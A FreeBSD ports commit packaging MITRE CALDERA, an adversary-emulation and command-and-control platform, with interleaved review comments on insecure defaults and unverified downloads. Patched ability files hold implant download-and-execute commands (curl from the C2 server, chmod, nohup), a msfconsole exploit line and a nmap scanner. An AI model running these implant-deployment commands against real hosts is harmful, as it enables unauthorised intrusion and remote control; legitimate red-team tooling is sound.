author | Jose Alonso Cardenas Marquez <acm@FreeBSD.org> | 2023-04-29 06:08:03 +0000 |
---|---|---|
committer | Jose Alonso Cardenas Marquez <acm@FreeBSD.org> | 2023-04-29 06:08:03 +0000 |
commit | 84e20fa24498f24ec36a846f4bb69cad07224937 (patch) | |
tree | 3d54a28c2f1328ff0c81ae14a5babd1c5e13e944 | |
parent | 5493ec9d4041b74ea9761c0972e3bfa5eb4abf77 (diff) | |
security/caldera: New port: Automated Adversary Emulation Platform
CALDERA is a cyber security platform designed to easily automate adversary
emulation, assist manual red-teams, and automate incident response.
It is built on the MITRE ATT&CK framework and is an active research project
at MITRE.
The framework consists of two components:
- The core system. This is the framework code, consisting of what is available
in this repository. Included is an asynchronous command-and-control (C2)
server with a REST API and a web interface.
- Plugins. These repositories expand the core framework capabilities and
provide additional functionality. Examples include agents, reporting,
collections of TTPs and more.
113 files changed, 3101 insertions, 0 deletions
diff --git a/security/Makefile b/security/Makefile index 624766505d37..2c7b9d8c6644 100644 --- a/security/Makefile +++ b/security/Makefile @@ -62,6 +62,7 @@ SUBDIR += bzrtp SUBDIR += ca_root_nss SUBDIR += caesarcipher + SUBDIR += caldera SUBDIR += calife SUBDIR += cardpeek SUBDIR += cargo-audit diff --git a/security/caldera/Makefile b/security/caldera/Makefile new file mode 100644 index 000000000000..8648038da272 --- /dev/null +++ b/security/caldera/Makefile 
@@ -0,0 +1,95 @@ +PORTNAME= caldera +DISTVERSION= 4.1.0 +CATEGORIES= security python + +MAINTAINER= acm@FreeBSD.org +COMMENT= Automated Adversary Emulation Platform +WWW= https://github.com/mitre/caldera + +LICENSE= APACHE20 +LICENSE_FILE= ${WRKSRC}/LICENSE + +RUN_DEPENDS= ${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}yaml>0:devel/py-yaml@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}cryptography>0:security/py-cryptography@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \ + 
${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \ + upx>0:archivers/upx \ + git>0:devel/git \ + bash>0:shells/bash + +USE_GITHUB= yes +GH_ACCOUNT= mitre +GH_PROJECT= ${PORTNAME} +GH_TUPLE= mitre:access:fff4c20:access/plugins/access \ + mitre:atomic:9e2c958:atomic/plugins/atomic \ + mitre:builder:1aca019:builder/plugins/builder \ + mitre:compass:fb88e02:compass/plugins/compass \ + mitre:debrief:d815b60:debrief/plugins/debrief \ + mitre:emu:5dbff82:emu/plugins/emu \ + mitre:fieldmanual:510d0b9:fieldmanual/plugins/fieldmanual \ + mitre:gameboard:3d98c32:gameboard/plugins/gameboard \ + mitre:human:4368dea:human/plugins/human \ + mitre:manx:e7205ea:manx/plugins/manx \ + mitre:mock:4ea3337:mock/plugins/mock \ + mitre:response:889213a:response/plugins/response \ + mitre:sandcat:de3405f:sandcat/plugins/sandcat \ + mitre:ssl:ac5bfcb:ssl/plugins/ssl \ + mitre:stockpile:9662f27:stockpile/plugins/stockpile \ + mitre:training:e309b0f:training/plugins/training + +USES= go:run python:3.8+ + +NO_ARCH= yes +NO_BUILD= yes + +USE_RC_SUBR= ${PORTNAME:S/-/_/} +SUB_FILES= pkg-message +SUB_LIST= PYTHON_CMD=${PYTHON_CMD} \ + WWWDIR=${WWWDIR} + +OPTIONS_DEFINE= HAPROXY +OPTIONS_DEFAULT=HAPROXY +HAPROXY_DESC= Support for HTTPS +HAPROXY_RUN_DEPENDS=haproxy18>0:net/haproxy18 + +post-extract: + ${RM} -R ${WRKSRC}/.github + cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \ + .git* .pre* .stylelintrc.json 
Dockerfile + +post-patch: + cd ${WRKSRC} && \ + ${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \; + +do-install: + @cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR} + +.include <bsd.port.mk> diff --git a/security/caldera/distinfo b/security/caldera/distinfo new file mode 100644 index 000000000000..d9ca85b369cf --- /dev/null +++ b/security/caldera/distinfo 
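Review bot: `OPTIONS_DEFAULT=HAPROXY` together with `HAPROXY_RUN_DEPENDS=haproxy18>0:net/haproxy18` in security/caldera/Makefile makes the HTTPS front end of this server depend on the 1.8 branch of HAProxy, which as far as I know upstream no longer maintains; please confirm, and if so depend on a supported branch instead, for example `HAPROXY_RUN_DEPENDS=haproxy>0:net/haproxy`. Separately, `do-install` copies the whole tree into `${WWWDIR}` with `${COPYTREE_SHARE}` while the rc script in this commit runs the server as `www`. The hunk does not show whether the server needs to write below `${WWWDIR}`; if it does, the writable paths should be listed explicitly rather than opening the whole tree to that user.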
@@ -0,0 +1,35 @@ +TIMESTAMP = 1681965363 +SHA256 (mitre-caldera-4.1.0_GH0.tar.gz) = 342516c29926dbd7e96bc2ba1558779d5ee423eac97a4c48d0245d7480a790eb +SIZE (mitre-caldera-4.1.0_GH0.tar.gz) = 3462547 +SHA256 (mitre-access-fff4c20_GH0.tar.gz) = 087dd5de918c5a2a5a73888abb3839e6d43335ac5f26ee739038813631a24358 +SIZE (mitre-access-fff4c20_GH0.tar.gz) = 8485 +SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085 +SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142 +SHA256 (mitre-builder-1aca019_GH0.tar.gz) = 563c54beed985b11edb96c7ec3a8349f8328a6534750801fa71693ed1cf34346 +SIZE (mitre-builder-1aca019_GH0.tar.gz) = 7946 +SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16 +SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907 +SHA256 (mitre-debrief-d815b60_GH0.tar.gz) = 565e234e52157b6259752c474c40eaa96f15921595f299cbd7875f4bc51e73aa +SIZE (mitre-debrief-d815b60_GH0.tar.gz) = 4419572 +SHA256 (mitre-emu-5dbff82_GH0.tar.gz) = 45b980caf2b9a59d1d9f4bba69334e1b74f036ae667bc510dfc1422ef58829d9 +SIZE (mitre-emu-5dbff82_GH0.tar.gz) = 16962 +SHA256 (mitre-fieldmanual-510d0b9_GH0.tar.gz) = d908a6f0eb4bf8295bc6c92e23aae5984bcd2006069af9ed880978b76c7c0984 +SIZE (mitre-fieldmanual-510d0b9_GH0.tar.gz) = 7811262 +SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a +SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753 +SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a +SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846 +SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470 +SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820 +SHA256 (mitre-mock-4ea3337_GH0.tar.gz) = 36447c30cdff3869796948bff8940b24e710f242e70255578095a10df4d0c5db +SIZE (mitre-mock-4ea3337_GH0.tar.gz) = 5470 +SHA256 (mitre-response-889213a_GH0.tar.gz) = 
4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee +SIZE (mitre-response-889213a_GH0.tar.gz) = 24463 +SHA256 (mitre-sandcat-de3405f_GH0.tar.gz) = dbb111552220d6f108f852f3d442dcc90d3457c488fbec3f176a4638a611cd56 +SIZE (mitre-sandcat-de3405f_GH0.tar.gz) = 7564017 +SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12 +SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395 +SHA256 (mitre-stockpile-9662f27_GH0.tar.gz) = ab74994666c6759261346bb0c7a653dde5982273d04afd18eb26e7d57c78210c +SIZE (mitre-stockpile-9662f27_GH0.tar.gz) = 4777470 +SHA256 (mitre-training-e309b0f_GH0.tar.gz) = 505d4d4447c9d35e2062064abe1d689f7bc92c818ccb450848e6e57619c24375 +SIZE (mitre-training-e309b0f_GH0.tar.gz) = 492099 diff --git a/security/caldera/files/caldera.in b/security/caldera/files/caldera.in new file mode 100644 index 000000000000..aaedbb017d79 --- /dev/null +++ b/security/caldera/files/caldera.in 
@@ -0,0 +1,84 @@ +#!/bin/sh + +# PROVIDE: caldera +# REQUIRE: NETWORKING +# KEYWORD: shutdown +# +# Configuration settings for caldera in /etc/rc.conf: +# +# caldera_enable: run caldera as service (default=NO) +# caldera_flags: additional flags for caldera server +# + +. /etc/rc.subr + +name=caldera +rcvar=caldera_enable + +load_rc_config ${name} + +export PATH="${PATH}:/usr/local/bin:/usr/local/sbin" + +: ${caldera_enable:=NO} +: ${caldera_flags="--insecure"} + +caldera_user="www" + +pidfile="/var/run/${name}.pid" + +caldera_wwwdir="%%WWWDIR%%" +python_command="%%PYTHON_CMD%%" +python_script="${caldera_wwwdir}/server.py" +start_cmd=${name}_start +status_cmd=${name}_status +stop_cmd=${name}_stop +restart_cmd=${name}_restart +extra_commands="status" + +caldera_start() +{ + if [ ! -f ${pidfile} ] + then + cd ${caldera_wwwdir} && \ + daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o /var/log/caldera.log \ + ${python_command} ${python_script} \ + ${caldera_flags} + + echo "Starting ${name}" + else + echo "${name} is running as pid" `cat ${pidfile}` + fi +} + +caldera_status() +{ + # If running, show pid + if [ -f ${pidfile} ] + then + echo "${name} is running as pid" `cat ${pidfile}` + else + echo "${name} is not running" + fi +} + +caldera_stop() +{ + if [ -f ${pidfile} ] + then + kill `cat ${pidfile}` + rm ${pidfile} + echo "Stopping ${name}" + else + echo "${name} not running? (check ${pidfile})." + fi +} + +caldera_restart() +{ + echo "Performing restart ${name}" + caldera_stop + sleep 3 + caldera_start +} + +run_rc_command "$1" diff --git a/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml new file mode 100644 index 000000000000..c0bc8a3c91ed --- /dev/null 
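Review bot: The rc script's default `: ${caldera_flags="--insecure"}` means that a service enabled with nothing but `caldera_enable=YES` starts the server in upstream's insecure mode, which as far as I know runs it on the shipped default configuration with its publicly documented default logins and API keys. For a C2 server installed from a package the safer default is `: ${caldera_flags=""}`, with `--insecure` described in pkg-message as an opt-in for isolated lab use. Separately, `caldera_start` and `caldera_stop` test only whether `${pidfile}` exists, so a stale file left by a crash blocks the next start, and the `kill` in `caldera_stop` may signal an unrelated process that has reused the pid. Setting `command=/usr/sbin/daemon` with `procname` and letting rc.subr do the pid check would avoid both.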
+++ b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml @@ -0,0 +1,11 @@ +--- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml +@@ -7,7 +7,7 @@ + name: Build or acquire exploits + attack_id: T1349 + platforms: +- darwin,linux: ++ darwin,freebsd,linux: + sh: + command: | + msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red} diff --git a/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml new file mode 100644 index 000000000000..f7304f2ee2ad --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml @@ -0,0 +1,11 @@ +--- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml +@@ -7,7 +7,7 @@ + name: Conduct active scanning + attack_id: T1254 + platforms: +- darwin,linux: ++ darwin,freebsd,linux: + sh: + command: | + ./scanner.sh #{target.ip} diff --git a/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh new file mode 100644 index 000000000000..acdadfff6d43 --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh 
@@ -0,0 +1,11 @@ +--- plugins/access/data/payloads/scanner.sh.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/payloads/scanner.sh +@@ -1,5 +1,5 @@ +-#!/bin/bash ++#!/bin/sh + + echo '[+] Starting basic NMAP scan' + nmap -Pn $1 +-echo '[+] Complete with module' +\ No newline at end of file ++echo '[+] Complete with module' diff --git a/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py new file mode 100644 index 000000000000..abc3e67c6ccf --- /dev/null +++ b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py @@ -0,0 +1,11 @@ +--- plugins/atomic/app/atomic_svc.py.orig 2022-08-11 15:59:49 UTC ++++ plugins/atomic/app/atomic_svc.py +@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld + from app.utility.base_service import BaseService + from app.objects.c_agent import Agent + +-PLATFORMS = dict(windows='windows', macos='darwin', linux='linux') ++PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd') + EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh') + RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL) + PREFIX_HASH_LEN = 6 diff --git a/security/caldera/files/patch-plugins_emu_app_emu__svc.py b/security/caldera/files/patch-plugins_emu_app_emu__svc.py new file mode 100644 index 000000000000..38eb16d85180 --- /dev/null +++ b/security/caldera/files/patch-plugins_emu_app_emu__svc.py @@ -0,0 +1,11 @@ +--- plugins/emu/app/emu_svc.py.orig 2022-06-12 20:12:01 UTC ++++ plugins/emu/app/emu_svc.py +@@ -12,7 +12,7 @@ from app.utility.base_service import BaseService + + + class EmuService(BaseService): +- _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'} ++ _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'} + + def __init__(self): + self.log = self.add_service('emu_svc', self) 
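Review bot: In the scanner.sh patch the context line `nmap -Pn $1` stays unquoted, so a target value containing whitespace or shell glob characters is split into additional nmap arguments instead of being treated as one host. The patch already rewrites the shebang and the last line of this five-line script, so it can carry the fix too: `nmap -Pn "$1"`. The caller shown in the preceding ability patch passes the value unquoted as well (`./scanner.sh #{target.ip}`) and would need the same quoting for the fix to be effective.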
diff --git a/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py new file mode 100644 index 000000000000..7121866698a1 --- /dev/null +++ b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py @@ -0,0 +1,11 @@ +--- plugins/gameboard/app/gameboard_api.py.orig 2021-12-22 15:33:52 UTC ++++ plugins/gameboard/app/gameboard_api.py +@@ -244,7 +244,7 @@ class GameboardApi(BaseService): + reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0] #TODO: replace + ability_id = str(uuid.uuid4()) + executors = [] +- for pl in ['windows', 'darwin', 'linux']: ++ for pl in ['windows', 'darwin', 'linux', 'freebsd']: + reference_executor = reference_ability.find_executor('elasticsearch', pl) + if not reference_executor: + continue diff --git a/security/caldera/files/patch-plugins_human_templates_human.html b/security/caldera/files/patch-plugins_human_templates_human.html new file mode 100644 index 000000000000..9bc604e58123 --- /dev/null +++ b/security/caldera/files/patch-plugins_human_templates_human.html 
@@ -0,0 +1,40 @@ +--- plugins/human/templates/human.html.orig 2022-09-06 17:33:12 UTC ++++ plugins/human/templates/human.html +@@ -60,6 +60,7 @@ + <select id="base-platform"> + <option disabled="disabled" selected="">Select target OS</option> + <option value="darwin">MacOS</option> ++ <option value="freebsd">FreeBSD</option> + <option value="linux">Linux</option> + <option value="windows-psh">Windows (PowerShell)</option> + </select> +@@ -257,6 +258,11 @@ + ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + + '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; + break; ++ case "freebsd": ++ baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + ++ ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + ++ '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; ++ break; + case "linux": + baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + + ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + +@@ -293,6 +299,10 @@ + $.each(extra, function(i, command) { + switch (platform) { + case "darwin": ++ command = command.replace(/\\/g, '\\\\'); ++ command = command.replace(/"/g, '\\\"'); ++ break; ++ case "freebsd": + command 
= command.replace(/\\/g, '\\\\'); + command = command.replace(/"/g, '\\\"'); + break; +@@ -317,4 +327,4 @@ + return provided_value || default_value; + } + +-</script> +\ No newline at end of file ++</script> diff --git a/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml new file mode 100644 index 000000000000..a641bf2abe45 --- /dev/null +++ b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml 
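Review bot: In the human.html patch the new `case "freebsd":` branch hard-codes `virtualenv -p python3.9`, whereas the port itself declares `python:3.8+` and the neighbouring branches use `python3`; the generated command fails on a target whose installed Python is any other version. If the unversioned `python3` name is not available on FreeBSD targets, that reason is worth recording in the commit message, because nothing in the patch explains the pin. The branch also copies `curl -sk` from the other platforms, so the archive that is then unpacked, pip-installed and executed is fetched without certificate verification. Running the server with a trusted certificate and dropping `-k` should at least be documented as the recommended setup.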
@@ -0,0 +1,33 @@ +--- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig 2022-08-08 23:34:48 UTC ++++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml +@@ -57,6 +57,30 @@ + contact="tcp"; + agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; + nohup ./$agent -http $server -socket $socket -contact $contact & ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.tcp}"; ++ contact="tcp"; ++ curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v ++ variations: ++ - description: Run against the UDP contact ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.udp}"; ++ contact="udp"; ++ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -http $server -socket $socket -contact $contact & ++ - description: Download with a random name and start as a background process ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.tcp}"; ++ contact="tcp"; ++ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -http $server -socket $socket -contact $contact & + windows: + psh: + command: | 
diff --git a/security/caldera/files/patch-plugins_manx_update-shells.sh b/security/caldera/files/patch-plugins_manx_update-shells.sh new file mode 100644 index 000000000000..97280531ab7d --- /dev/null +++ b/security/caldera/files/patch-plugins_manx_update-shells.sh @@ -0,0 +1,12 @@ +--- plugins/manx/update-shells.sh.orig 2022-08-08 23:34:48 UTC ++++ plugins/manx/update-shells.sh +@@ -1,7 +1,8 @@ +-#!/bin/bash ++#!/bin/sh + cwd=$(pwd) + cd shells + GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go + GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go + GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go ++GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go + cd $cwd diff --git a/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml new file mode 100644 index 000000000000..4df13e956c00 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml @@ -0,0 +1,15 @@ +--- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml +@@ -24,3 +24,12 @@ + python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 + cleanup: | + pkill -f elasticat ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py; ++ pip install requests; ++ python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 ++ cleanup: | ++ pkill -f elasticat 
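Review bot: In the 1837b43e ability patch the added `freebsd:` block runs `pip install requests` and `python elasticat.py`, but unversioned `pip` and `python` commands are not necessarily present on a FreeBSD host (the human.html patch in this same commit names `python3.9` explicitly), so the ability may fail there and is worth testing on a clean install. The download is also unchecked: `curl -s ... > elasticat.py` writes whatever the server returns, including an error body, and the next line executes it. `curl -sf ... -o elasticat.py || exit 1` would stop before running a bad file. `pip install requests` additionally fetches an unpinned package from the network onto the monitored host at run time; listing it as a documented prerequisite would avoid that.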
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml new file mode 100644 index 000000000000..e34453b7e11c --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml +@@ -9,7 +9,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml new file mode 100644 index 000000000000..2962be97e40c --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml +@@ -17,7 +17,7 @@ + - source: remote.port.unauthorized + edge: has_pid + target: host.pid.unauthorized +- linux: ++ freebsd,linux: + sh: + command: | + ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}' +@@ -34,4 +34,4 @@ + plugins.response.app.parsers.process: + - source: remote.port.unauthorized + edge: has_pid +- target: host.pid.unauthorized +\ No newline at end of file ++ target: host.pid.unauthorized 
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml new file mode 100644 index 000000000000..5c45a62b261e --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + filepath="#{file.sensitive.path}"; +@@ -46,4 +46,4 @@ + edge: has_hash + target: file.sensitive.hash + - plugins.stockpile.app.requirements.paw_provenance: +- - source: file.sensitive.hash +\ No newline at end of file 